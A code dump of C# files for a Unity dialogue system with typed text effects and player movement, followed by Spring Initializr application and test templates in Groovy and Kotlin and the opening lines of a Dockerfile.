this.DisplayNextSentence();
}
/// <summary>
/// Display next sentence in dialogue
/// </summary>
private void DisplayNextSentence()
{
this.StopAllCoroutines();
if ( this.controller.DisplayNextSentence() )
{
this.StartCoroutine( this.controller.TypeSentence() );
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/ConversationStatus.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
/// <summary>
/// Status of a conversation, each status contains the Dialogue that will be displayed one after another.
/// </summary>
[System.Serializable]
public class ConversationStatus
{
/// <summary>
/// Name of the Status.
/// </summary>
public string Name;
/// <summary>
/// Index of the the NextStatus in the Conversation Status List
/// </summary>
public int NextStatusIndex;
/// <summary>
/// The complete Dialogue which will be displayed.
/// </summary>
public Dialogue Dialogue;
/// <summary>
/// The List of the unlocked <see cref="ConversationStatus"/> in other Conversations.
/// </summary>
public List<PendingStatus> NewConversations;
/// <summary>
/// Gets or sets the <see cref="ConversationStatus"/> in which the Conversation will be once the Dialogue of the current Status ends.
/// </summary>
public ConversationStatus NextStatus { get; set; }
}
}
<|start_filename|>Assets/MovementSystem/Scripts/PlayerMovement.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class PlayerMovement : MonoBehaviour {
private Rigidbody2D rBody;
private Animator animator;
public int SpeedMultiplier = 1;
void Start () {
rBody = GetComponent<Rigidbody2D>();
animator = GetComponent<Animator>();
}
void Update () {
Vector2 movement_vector = new Vector2(Input.GetAxisRaw("Horizontal"), Input.GetAxisRaw("Vertical"));
if(movement_vector != Vector2.zero) {
animator.SetBool( "isWalking", true );
animator.SetFloat( "input_x", movement_vector.x );
animator.SetFloat( "input_y", movement_vector.y );
}
else {
animator.SetBool( "isWalking", false );
}
rBody.MovePosition( rBody.position + movement_vector * Time.deltaTime * SpeedMultiplier);
}
}
<|start_filename|>Assets/MovementSystem/Scripts/CameraFollow.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class CameraFollow : MonoBehaviour {
public Transform target;
public float Speed = 0.1f;
private Camera myCam;
void Start () {
myCam = GetComponent<Camera>();
}
void FixedUpdate () {
myCam.orthographicSize = (Screen.height / 1000f) ;
if (target) {
transform.position = Vector3.Lerp(transform.position, target.position, Speed)
+ new Vector3(0, 0, -10);
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Classes/Character.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DialogueManager.Models;
/// <summary>
/// A character scriptable object, can be created in Unity Editor
/// </summary>
[CreateAssetMenu( fileName = "New Character", menuName = "Character" )]
public class Character : ScriptableObject
{
/// <summary> Name of the <see cref="Character"/> </summary>
public string Name;
/// <summary> List of <see cref="Expression"/> of the <see cref="Character"/>. </summary>
public List<Expression> Expressions;
/// <summary> Sound that will be played each time a letter or character is added to the dialogue display </summary>
public AudioClip Voice;
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Letter.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
using UnityEngine.UI;
public class Letter
{
public float Speed;
public char Character;
public TextEffect Effect;
public bool isActive;
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/ConversationComponent.cs<|end_filename|>
namespace DialogueManager.GameComponents
{
using System;
using System.Collections;
using System.Collections.Generic;
using DialogueManager.Controllers;
using DialogueManager.Models;
using UnityEngine;
/// <summary>
/// Conversation Component, must be added for every single NPC or Situation that has a Conversation
/// </summary>
public class ConversationComponent : MonoBehaviour
{
/// <summary> Model of the Conversation </summary>
public Conversation Model;
/// <summary> Controller of the Conversation </summary>
private ConversationController controller;
/// <summary>
/// Triggers the Conversation, displaying the Active Status.
/// </summary>
public void Trigger()
{
this.Model.GameConversations = GameObject
.Find( "GameConversations" )
.GetComponent<GameConversationsComponent>()
.Model;
DialogueManager dialogueManager = GameObject
.Find( "DialogueManager" )
.GetComponent<DialogueManagerComponent>()
.Model;
this.controller.Trigger( dialogueManager );
}
/// <summary> Creation of the Controller </summary>
private void Awake()
{
this.controller = new ConversationController( this.Model );
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/ConversationStatusEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the Conversation Status List
/// </summary>
public class ConversationStatusEditor
{
/// <summary> Index of the displayed element in the status Foldout </summary>
private static int statusFoldoutDisplay = -1;
/// <summary> List of ConversationStatus being displayed </summary>
private static List<ConversationStatus> status;
/// <summary> Array with the names of all the Status </summary>
private static string[] statusNames;
/// <summary>
/// Displays on the Inspector GUI a List of Conversation Status
/// </summary>
/// <param name="status">List of Conversation Status</param>
/// <param name="statusListNames">Array containing the Names of each Conversation Status</param>
public static void Display( List<ConversationStatus> status, string[] statusListNames )
{
ConversationStatusEditor.status = status;
ConversationStatusEditor.statusNames = statusListNames;
for (int i = 0; i < status.Count; i++)
{
bool display = i == statusFoldoutDisplay;
display = EditorGUILayout.Foldout( display, status[i].Name );
if (!display && i == statusFoldoutDisplay)
{
statusFoldoutDisplay = -1;
}
if (display)
{
EditorGUILayout.BeginVertical( GUI.skin.box );
DisplayNameAndRemoveButton( i );
DisplayNextStatus( i );
DialogueEditor.Display( status[i].Dialogue );
NewConversationsEditor.Display( status[i].NewConversations );
EditorGUILayout.EndVertical();
}
}
}
/// <summary>
/// Displays the Name and the Remove Button of the Conversation Status on the Inspector
/// </summary>
/// <param name="i">Index in the List of the Status</param>
private static void DisplayNameAndRemoveButton( int i )
{
statusFoldoutDisplay = i;
GUILayout.BeginHorizontal();
status[i].Name = EditorGUILayout.TextField( "Status Name", status[i].Name );
if (GUILayout.Button( EditorButtons.RemoveStatusButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
status.RemoveAt( i );
statusFoldoutDisplay = -1;
return;
}
GUILayout.EndHorizontal();
}
/// <summary>
/// Displays a Dropdown menu for the user to select the Status to be the next one after the current
/// </summary>
/// <param name="i">Index in the List of the Status</param>
private static void DisplayNextStatus( int i )
{
if (status[i].NextStatusIndex >= status.Count)
{
status[i].NextStatusIndex = 0;
}
status[i].NextStatusIndex = EditorGUILayout.Popup(
"Next Status",
status[i].NextStatusIndex,
statusNames,
EditorStyles.popup );
status[i].NextStatus = status[status[i].NextStatusIndex];
}
}
}
<|start_filename|>Assets/TextSeparator/TextSeparator.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
public class TextSeparator : MonoBehaviour {
public string text = "YO CUANDO QUIROZ NO VA A LA GRADUACION";
public Font font;
public Material material;
void Start()
{
for (int i = 0; i < text.Length; i++){
GameObject newGO = new GameObject(text[i].ToString());
newGO.transform.SetParent(this.transform);
Text myText = newGO.AddComponent<Text>();
RectTransform parentTransform = GetComponentInParent<RectTransform>();
myText.text = text[i].ToString();
myText.alignment = TextAnchor.LowerCenter;
myText.font = font;
myText.material = material;
//myText.GetComponent<RectTransform>().localPosition = new Vector3(parentTransform.localPosition.x + (i*17) , parentTransform.localPosition.y, myText.rectTransform.localPosition.z);
myText.GetComponent<RectTransform>().localPosition = new Vector3( i * 17 , 0, 0);
myText.fontSize = 40;
myText.color = new Color(1f, 0.0f, 0.0f,1.0f);
//newGO.AddComponent<ShakeText>();
newGO.AddComponent<WaveText>();
newGO.GetComponent<WaveText>().Offset = .15f * i;
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/EditorButtons.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
/// <summary>
/// Static public values of the buttons for the Editors
/// </summary>
public class EditorButtons
{
/// <summary> Width of a normal Button </summary>
public static GUILayoutOption NormalButtonWidth = GUILayout.Width( 85f );
/// <summary> Width of a Mini Button </summary>
public static GUILayoutOption MiniButtonWidth = GUILayout.Width( 24f );
/// <summary> Add Status Editor GUI Button </summary>
public static GUIContent AddStatusButton = new GUIContent( "Add", "Add Status" );
/// <summary> Remove Status Editor GUI Button </summary>
public static GUIContent RemoveStatusButton = new GUIContent( "-", "Remove Status" );
/// <summary> Add Dialgue Editor GUI Button </summary>
public static GUIContent AddDialogueButton = new GUIContent( "Add", "Add Dialogue" );
/// <summary> Remove Dialogue Editor GUI Button </summary>
public static GUIContent RemoveDialogueButton = new GUIContent( "-", "Remove Dialogue" );
/// <summary> Add Pending Status Button </summary>
public static GUIContent AddPendingStatusButton = new GUIContent( "Add", "Add PendingStatus" );
/// <summary> Remove Pending Status Button </summary>
public static GUIContent RemovePendingStatusButton = new GUIContent( "-", "Remove PendingStatus" );
/// <summary> Add Expression Button </summary>
public static GUIContent AddExpressionButton = new GUIContent( "Add", "Add Expression" );
/// <summary> Remove Expression Button </summary>
public static GUIContent RemoveExpressionButton = new GUIContent( "-", "Remove Expression" );
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Builders/TextEffectBuilders/ITextEffectBuilder.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public interface ITextEffectBuilder
{
TextEffect Build(GameObject gameObject);
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/ConversationEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using System.Linq;
using DialogueManager.GameComponents;
using DialogueManager.Models;
using UnityEditor;
using UnityEditor.SceneManagement;
using UnityEngine;
/// <summary>
/// Inspector custom editor of the Conversation Component
/// </summary>
[CustomEditor( typeof( ConversationComponent ) )]
public class ConversationEditor : Editor
{
/// <summary>
/// When the GUI is displayed
/// </summary>
public override void OnInspectorGUI()
{
EditorGUI.BeginChangeCheck();
serializedObject.Update();
ConversationComponent conversationComponent = ( ConversationComponent )target;
Conversation model = conversationComponent.Model;
model.Name = EditorGUILayout.TextField( "Name", model.Name );
if (model.Status == null)
{
model.Status = new List<ConversationStatus>();
}
if (model.Status.Count > 0)
{
string[] statusListNames = model.Status.Select( s => s.Name ).ToArray();
model.ActiveStatusIndex = EditorGUILayout.Popup(
"Active Status",
model.ActiveStatusIndex,
statusListNames,
EditorStyles.popup );
model.ActiveStatus = model.Status[model.ActiveStatusIndex];
EditorGUILayout.Space();
EditorGUILayout.LabelField( "Status List", EditorStyles.boldLabel );
ConversationStatusEditor.Display( model.Status, statusListNames );
}
if (GUILayout.Button( EditorButtons.AddStatusButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
ConversationStatus newStatus = new ConversationStatus();
newStatus.Name = "Status " + ( model.Status.Count + 1 );
model.Status.Add( newStatus );
}
EditorGUILayout.Space();
EditorGUILayout.Space();
if (EditorGUI.EndChangeCheck())
{
serializedObject.ApplyModifiedProperties();
EditorUtility.SetDirty( this.target );
if (!Application.isPlaying)
{
EditorSceneManager.MarkSceneDirty( EditorSceneManager.GetActiveScene() );
}
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Dialogue.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Dialogue class, with all the sentences that will be displayed in the Status
/// </summary>
[System.Serializable]
public class Dialogue
{
/// <summary>
/// A List in which each <see cref="Sentence"/> contains a game dialogue line.
/// </summary>
public List<Sentence> Sentences;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/GameConversations.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
/// <summary>
/// Model of the Game Conversations, contains al the Pending Conversations with every NPC or situation.
/// If a Conversation is Triggered and it has a Pending Conversation, the Status will be changed to the one specified.
/// </summary>
public class GameConversations
{
/// <summary> Gets or sets the dictionary of the Pending Status, Key = Name of the Conversation</summary>
public Dictionary<string, List<PendingStatus>> PendingConversations { get; set; }
/// <summary> Gets or sets the list of conversations that haven't been added to PendingConversations </summary>
public List<PendingStatus> ConversationsToAdd { get; set; }
}
/// <summary>
/// Name of the Conversation and Status that is pending to be triggered
/// </summary>
[System.Serializable]
public class PendingStatus
{
/// <summary> Name of the <see cref="Conversation"/> </summary>
public string ConversationName;
/// <summary> Name of the <see cref="ConversationStatus"/> </summary>
public string StatusName;
/// <summary> Importante of the <see cref="ConversationStatus"/>, higher means more important </summary>
public int Importance;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Conversation.cs<|end_filename|>
namespace DialogueManager.Models
{
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
/// <summary>
/// The Conversation Class contains all the posible Dialogues the NPC or situation can have.
/// </summary>
[System.Serializable]
public class Conversation
{
/// <summary> Name of the conversation. </summary>
public string Name;
/// <summary> <see cref="ConversationStatus"/> of the conversation if a Dialogue was Triggered. </summary>
public ConversationStatus ActiveStatus;
/// <summary> Index in the Status List of the Active Status </summary>
public int ActiveStatusIndex;
/// <summary> List containing all the possible <see cref="ConversationStatus"/> each with it's Dialogues. </summary>
public List<ConversationStatus> Status;
/// <summary> Gets or sets the pending GameConversations of the scene </summary>
public GameConversations GameConversations { get; set; }
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Sentence.cs<|end_filename|>
namespace DialogueManager.Models
{
using UnityEngine;
/// <summary>
/// Each dialogue has several sentences, and each sentence has text, and character
/// </summary>
[System.Serializable]
public class Sentence
{
/// <summary> Character who will be talking </summary>
public Character Character;
/// <summary> Index of the used Expression in the list of the character expressions </summary>
public int ExpressionIndex;
/// <summary> The text that will be displayed. </summary>
[TextArea( 3, 10 )]
public string Paragraph;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/DialogueManager.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
using UnityEngine.UI;
/// <summary>
/// Model of the main Dialogue Manager
/// </summary>
[Serializable]
public class DialogueManager
{
/// <summary> Prefabs of the Dialogue Box, text and image. </summary>
public GameObject CanvasObjectsPrefab;
/// <summary> Prefab of the GameConversations. </summary>
public GameObject GameConversationsPrefab;
/// <summary> Time between each letter. </summary>
public float WaitTime = .01f;
/// <summary> Volume of the Voice of the characters. </summary>
public float VoiceVolume = 1f;
/// <summary> Is double tap. </summary>
public bool DoubleTap = true;
/// <summary> Key which must be pressed to continue to the next Sentence. </summary>
public string NextKey = "z";
/// <summary> Font </summary>
public Font Font;
/// <summary> FontMaterial </summary>
public Material Material;
/// <summary> Gets or sets the Text that is being displayed on the Scene. </summary>
public Transform DialogueStartPoint { get; set; }
/// <summary> Gets or sets the Image that is being displayed on the Scene. </summary>
public Image ImageText { get; set; }
/// <summary> Gets or sets the Animation that causes the Dialogue box to go up or down. </summary>
public Animator Animator { get; set; }
/// <summary> Gets or sets the Audio that the current dialogue is showing. </summary>
public AudioSource Source { get; set; }
/// <summary> Gets or sets a value indicating whether the Dialogue has finished or not. </summary>
public bool Finished { get; set; }
/// <summary> Gets or sets the <see cref="Dialogue"/> that will be displayed. </summary>
public Dialogue DialogueToShow { get; set; }
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/GameConversationsComponent.cs<|end_filename|>
namespace DialogueManager.GameComponents
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using DialogueManager.Controllers;
using DialogueManager.Models;
using UnityEngine;
/// <summary>
/// Component of all the Pending Conversations in the Game
/// </summary>
public class GameConversationsComponent : MonoBehaviour
{
/// <summary> Model of the GameConversations </summary>
public GameConversations Model;
/// <summary> Controller of the GameConversations </summary>
private GameConversationsController controller;
/// <summary> Creation of Controller and Model </summary>
private void Awake()
{
if (this.Model == null)
{
this.Model = new GameConversations();
}
this.controller = new GameConversationsController( this.Model );
}
/// <summary> Is called once per frame. </summary>
private void Update()
{
if (this.Model.ConversationsToAdd.Count > 0)
{
this.AddConversation();
}
}
/// <summary> Adds Pending Conversations to the List </summary>
private void AddConversation()
{
this.controller.AddConversation();
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/TextEffects/WaveEffect.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class WaveEffect : TextEffect
{
public float Frequency = 8.0f;
public float Magnitude = 1.5f;
public float Offset;
public WaveEffect( GameObject gameObject ) : base( gameObject )
{
}
private void Start()
{
m_startPos = this.gameObject.transform.localPosition;
}
public override void Update()
{
float y = Mathf.Sin( ( Offset + Time.time ) * Frequency ) * Magnitude;
this.gameObject.transform.localPosition = m_startPos + new Vector3( 0.0f, y, 0.0f );
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/NewConversationsEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the New Conversations unlocked
/// </summary>
public class NewConversationsEditor
{
/// <summary> Index of the displayed element in the new conversations Foldout </summary>
private static int newConversationsFoldoutDisplay = -1;
/// <summary>
/// Displays on the Inspector GUI a List of PendingStatus
/// </summary>
/// <param name="conversations">List of Pending Status (new conversations unlocked)</param>
public static void Display( List<PendingStatus> conversations )
{
if (conversations == null)
{
conversations = new List<PendingStatus>();
}
EditorGUILayout.LabelField( "New Conversations", EditorStyles.boldLabel );
for (int i = 0; i < conversations.Count; i++)
{
EditorGUI.indentLevel++;
GUILayout.BeginHorizontal();
bool display = i == newConversationsFoldoutDisplay;
display = EditorGUILayout.Foldout( display, conversations[i].ConversationName );
if (GUILayout.Button( EditorButtons.RemovePendingStatusButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
conversations.RemoveAt( i );
newConversationsFoldoutDisplay = -1;
break;
}
GUILayout.EndHorizontal();
if (!display && i == newConversationsFoldoutDisplay)
{
newConversationsFoldoutDisplay = -1;
}
if (display)
{
newConversationsFoldoutDisplay = i;
EditorGUI.indentLevel++;
conversations[i].ConversationName = EditorGUILayout.TextField( "Conversation", conversations[i].ConversationName );
conversations[i].StatusName = EditorGUILayout.TextField( "Status", conversations[i].StatusName );
conversations[i].Importance = EditorGUILayout.IntField( "Importance", conversations[i].Importance );
EditorGUI.indentLevel--;
}
EditorGUI.indentLevel--;
}
if (GUILayout.Button( EditorButtons.AddPendingStatusButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
PendingStatus pendingStatus = new PendingStatus();
conversations.Add( pendingStatus );
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/SentenceEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Linq;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for a Sentence
/// </summary>
public class SentenceEditor
{
/// <summary>
/// Displays on the Inspector GUI a Sentence
/// </summary>
/// <param name="sentence">Sentence to be displayed</param>
public static void Display( Sentence sentence)
{
sentence.Character = EditorGUILayout.ObjectField( "Character", sentence.Character, typeof( Character ), true ) as Character;
if (sentence.Character != null)
{
string[] expressionListNames = sentence.Character.Expressions.Select( e => e.Name ).ToArray();
sentence.ExpressionIndex = EditorGUILayout.Popup(
"Expression",
sentence.ExpressionIndex,
expressionListNames,
EditorStyles.popup );
EditorGUILayout.LabelField( "Paragraph:" );
EditorGUI.indentLevel++;
sentence.Paragraph = EditorGUILayout.TextArea( sentence.Paragraph, GUILayout.MaxHeight( 75 ) );
EditorGUI.indentLevel--;
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Builders/TextEffectBuilders/WaveEffectBuilder.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class WaveEffectBuilder : ITextEffectBuilder
{
private float currentOffset = 0;
public TextEffect Build( GameObject gameObject )
{
WaveEffect effect = new WaveEffect( gameObject );
effect.Offset = currentOffset;
currentOffset += 0.08f;
return effect;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/LetterComponent.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
using UnityEngine.UI;
public class LetterComponent : MonoBehaviour
{
public Letter Model;
private void Update()
{
if (this.Model.Effect != null)
{
this.Model.Effect.Update();
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/DialogueManagerEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using UnityEngine;
using System.Collections;
using UnityEditor;
using DialogueManager.GameComponents;
[CustomEditor( typeof( DialogueManagerComponent ) )]
public class DialogueManagerEditor : Editor
{
private SerializedProperty gameConversationsProperty;
private SerializedProperty canvasObjectsProperty;
private SerializedProperty waitTimeProperty;
private SerializedProperty voiceVolumeProperty;
private SerializedProperty doubleTapProperty;
private SerializedProperty nextKeyProperty;
private SerializedProperty fontProperty;
private SerializedProperty materialProperty;
void OnEnable()
{
gameConversationsProperty = serializedObject.FindProperty("Model.GameConversationsPrefab");
canvasObjectsProperty = serializedObject.FindProperty( "Model.CanvasObjectsPrefab" );
waitTimeProperty = serializedObject.FindProperty( "Model.WaitTime" );
voiceVolumeProperty = serializedObject.FindProperty( "Model.VoiceVolume" );
doubleTapProperty = serializedObject.FindProperty( "Model.DoubleTap" );
nextKeyProperty = serializedObject.FindProperty( "Model.NextKey" );
fontProperty = serializedObject.FindProperty( "Model.Font" );
materialProperty = serializedObject.FindProperty( "Model.Material" );
}
public override void OnInspectorGUI()
{
serializedObject.Update();
EditorGUILayout.PropertyField(gameConversationsProperty, false);
EditorGUILayout.PropertyField( canvasObjectsProperty, false );
EditorGUILayout.PropertyField( waitTimeProperty, true );
EditorGUILayout.PropertyField( voiceVolumeProperty, true );
EditorGUILayout.PropertyField( doubleTapProperty, true );
EditorGUILayout.PropertyField( nextKeyProperty, true );
EditorGUILayout.PropertyField( fontProperty, false );
EditorGUILayout.PropertyField( materialProperty, false );
serializedObject.ApplyModifiedProperties();
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Controllers/DialogueManagerController.cs<|end_filename|>
namespace DialogueManager.Controllers
{
using System.Collections;
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEngine;
using UnityEngine.UI;
public class DialogueManagerController : MonoBehaviour
{
private Queue<string> sentences;
private Queue<Sprite> sprites;
private Queue<AudioClip> voices;
private AudioClip audioQueue;
private bool parsing;
private string timeString, sentence;
private Expression expression;
private List<LetterComponent> letters;
private List<float> speeds;
private List<ITextEffectBuilder> effects;
private int fontSize = 30;
private int boxSize = 380;
private int currentX = 0;
private int currentY = 0;
private float currentSpeed = 0.01f;
private ITextEffectBuilder currentEffect = null;
public DialogueManager Model;
public DialogueManagerController( DialogueManager Model )
{
this.Model = Model;
this.sentences = new Queue<string>();
this.sprites = new Queue<Sprite>();
this.voices = new Queue<AudioClip>();
this.letters = new List<LetterComponent>();
this.speeds = new List<float>();
this.effects = new List<ITextEffectBuilder>();
}
/// <summary>
/// Start new dialogue, and reset all data from previous dialogues
/// </summary>
/// <param name="dialogue">Dialogue that will be displayed</param>
public void StartDialogue()
{
Dialogue dialogue = this.Model.DialogueToShow;
this.Model.DialogueToShow = null;
this.Model.Animator.SetBool( "IsOpen", true );
voices.Clear();
sprites.Clear();
sentences.Clear();
foreach (Sentence sentence in dialogue.Sentences)
{
expression = sentence.Character.Expressions[sentence.ExpressionIndex];
sprites.Enqueue( expression.Image );
sentences.Enqueue( sentence.Paragraph );
voices.Enqueue( sentence.Character.Voice );
}
}
/// <summary>
/// Display next sentence in dialogue
/// </summary>
/// <returns>If there was a Sentence to be displayed or not</returns>
public bool DisplayNextSentence()
{
foreach (LetterComponent letter in this.letters)
{
GameObject.Destroy( letter.gameObject );
}
this.currentSpeed = this.Model.WaitTime;
this.currentEffect = null;
this.effects.Clear();
this.speeds.Clear();
this.letters.Clear();
this.currentX = 0;
this.currentY = 0;
if (sentences.Count == 0)
{
EndDialogue();
return false;
}
this.Model.ImageText.sprite = sprites.Dequeue();
this.sentence = sentences.Dequeue();
this.audioQueue = voices.Dequeue();
this.Model.WaitTime = 0f;
string onlyWords = string.Empty;
for (int i = 0; i < this.sentence.Length; i++)
{
if (this.sentence[i] == '[')
{
i = this.changeSpeed( i );
}
else if (this.sentence[i] == '<')
{
i = this.changeEffect( i );
}
else
{
this.effects.Add( this.currentEffect );
if (this.sentence[i] != ' ')
{
this.speeds.Add( ( float )this.currentSpeed );
}
onlyWords += this.sentence[i];
}
}
string[] words = onlyWords.Split( ' ' );
int letterSpacing = ( int )( this.fontSize * 0.5 );
int currentIndexEffects = 0;
int currentIndexSpeeds = 0;
foreach (string word in words)
{
GameObject wordObject = new GameObject( word, typeof( RectTransform ) );
wordObject.transform.SetParent( this.Model.DialogueStartPoint );
int wordSize = word.Length * letterSpacing;
if (this.currentX + wordSize > this.boxSize)
{
this.currentX = 0;
this.currentY -= ( int )( this.fontSize * 0.9 );
}
wordObject.GetComponent<RectTransform>().localPosition = new Vector3( currentX, currentY, 0 );
for (int i = 0; i < word.Length; i++)
{
GameObject letterObject = new GameObject( word[i].ToString() );
letterObject.transform.SetParent( wordObject.transform );
Text myText = letterObject.AddComponent<Text>();
myText.text = word[i].ToString();
myText.alignment = TextAnchor.LowerCenter;
myText.fontSize = this.fontSize;
myText.font = this.Model.Font;
myText.material = this.Model.Material;
myText.GetComponent<RectTransform>().localPosition = new Vector3( i * letterSpacing, 0, 0 );
myText.color = new Color( 0.0f, 0.0f, 0.0f, 0.0f );
RectTransform rt = letterObject.GetComponentInParent<RectTransform>();
rt.sizeDelta = new Vector2( this.fontSize, this.fontSize );
rt.pivot = new Vector2( 0, 1 );
LetterComponent letterComponent = letterObject.AddComponent<LetterComponent>();
Letter newLetter = new Letter
{
Character = word[i],
Speed = this.speeds[currentIndexSpeeds],
isActive = false
};
if (this.effects[currentIndexEffects] != null)
{
newLetter.Effect = this.effects[currentIndexEffects].Build( letterObject );
}
letterComponent.Model = newLetter;
this.letters.Add( letterComponent );
currentIndexEffects++;
currentIndexSpeeds++;
}
currentX += wordSize + letterSpacing;
currentIndexEffects++;
}
return true;
}
public int changeSpeed( int i )
{
i++;
string speed = string.Empty;
while (this.sentence[i] != ']')
{
speed += this.sentence[i];
i++;
}
this.currentSpeed = float.Parse( speed );
return i;
}
public int changeEffect( int i )
{
i++;
string effect = string.Empty;
while (this.sentence[i] != '>')
{
effect += this.sentence[i];
i++;
}
if (TextEffect.effects.ContainsKey( effect ))
{
this.currentEffect = TextEffect.effects[effect];
}
else
{
this.currentEffect = null;
}
return i;
}
/// <summary>
/// Method that will be typing and displaying the sentence and checking for [time] indicators
/// </summary>
/// <returns>Necessary for the WaitForSeconds function</returns>
public IEnumerator TypeSentence()
{
timeString = "";
parsing = false;
foreach (LetterComponent letter in this.letters)
{
if (letter == null)
{
break;
}
Text text = letter.GetComponent<Text>();
text.color = new Color( 0.0f, 0.0f, 0.0f, 1.0f );
this.Model.Source.PlayOneShot( audioQueue, this.Model.VoiceVolume );
yield return new WaitForSeconds( letter.Model.Speed );
}
this.Model.Finished = true;
}
/// <summary>
/// Hides dialogue box
/// </summary>
public void EndDialogue()
{
this.Model.Animator.SetBool( "IsOpen", false );
}
/// <summary>
/// Parses the sentence, for fully displaying it.
/// </summary>
/// <param name="sentence">Sentence to be parsed.</param>
/// <returns>Returns the complete sentence witout the [time] labels</returns>
private string ParseSentence( string sentence )
{
string parsedSentence = "";
bool normalSentence = true;
foreach (char letter in sentence.ToCharArray())
{
if (letter == '[')
{
normalSentence = false;
}
if (letter == ']')
{
normalSentence = true;
}
if (normalSentence)
{
if (letter != ']')
{
parsedSentence += letter;
}
}
}
return parsedSentence;
}
}
}
| ricgby/UnityDialogueSystem |
<|start_filename|>initializr-generator/src/main/resources/templates/Application.groovy<|end_filename|>
package {{packageName}}
import org.springframework.boot.SpringApplication
{{applicationImports}}
{{applicationAnnotations}}
class {{applicationName}} {
static void main(String[] args) {
SpringApplication.run({{applicationName}}, args)
}
}
<|start_filename|>initializr-generator/src/main/resources/templates/ApplicationTests.kt<|end_filename|>
package {{packageName}}
import org.junit.Test
import org.junit.runner.RunWith
{{testImports}}
@RunWith(SpringRunner::class)
@SpringBootTest
{{testAnnotations}}class {{applicationName}}Tests {
@Test
fun contextLoads() {
}
}
<|start_filename|>initializr-generator/src/main/resources/templates/ApplicationTests.groovy<|end_filename|>
package {{packageName}}
import org.junit.Test
import org.junit.runner.RunWith
{{testImports}}
@RunWith(SpringRunner)
@SpringBootTest
{{testAnnotations}}class {{applicationName}}Tests {
@Test
void contextLoads() {
}
}
<|start_filename|>initializr-generator/src/main/resources/templates/Application.kt<|end_filename|>
package {{packageName}}
{{^kotlinSupport}}
import org.springframework.boot.SpringApplication
{{/kotlinSupport}}
{{applicationImports}}
{{#kotlinSupport}}
import org.springframework.boot.runApplication
{{/kotlinSupport}}
{{applicationAnnotations}}
class {{applicationName}}
fun main(args: Array<String>) {
{{^kotlinSupport}}
SpringApplication.run({{applicationName}}::class.java, *args)
{{/kotlinSupport}}
{{#kotlinSupport}}
runApplication<{{applicationName}}>(*args)
{{/kotlinSupport}}
}
<|start_filename|>initializr-generator/src/main/resources/templates/ServletInitializer.groovy<|end_filename|>
package {{packageName}}
import org.springframework.boot.builder.SpringApplicationBuilder
{{servletInitializrImport}}
class ServletInitializer extends SpringBootServletInitializer {
@Override
protected SpringApplicationBuilder configure(SpringApplicationBuilder application) {
application.sources({{applicationName}})
}
}
| chtompki/initializr |
<|start_filename|>docker/Dockerfile<|end_filename|>
FROM ubuntu:20.04
MAINTAINER <NAME> <<EMAIL>>
RUN apt-get update -qq \
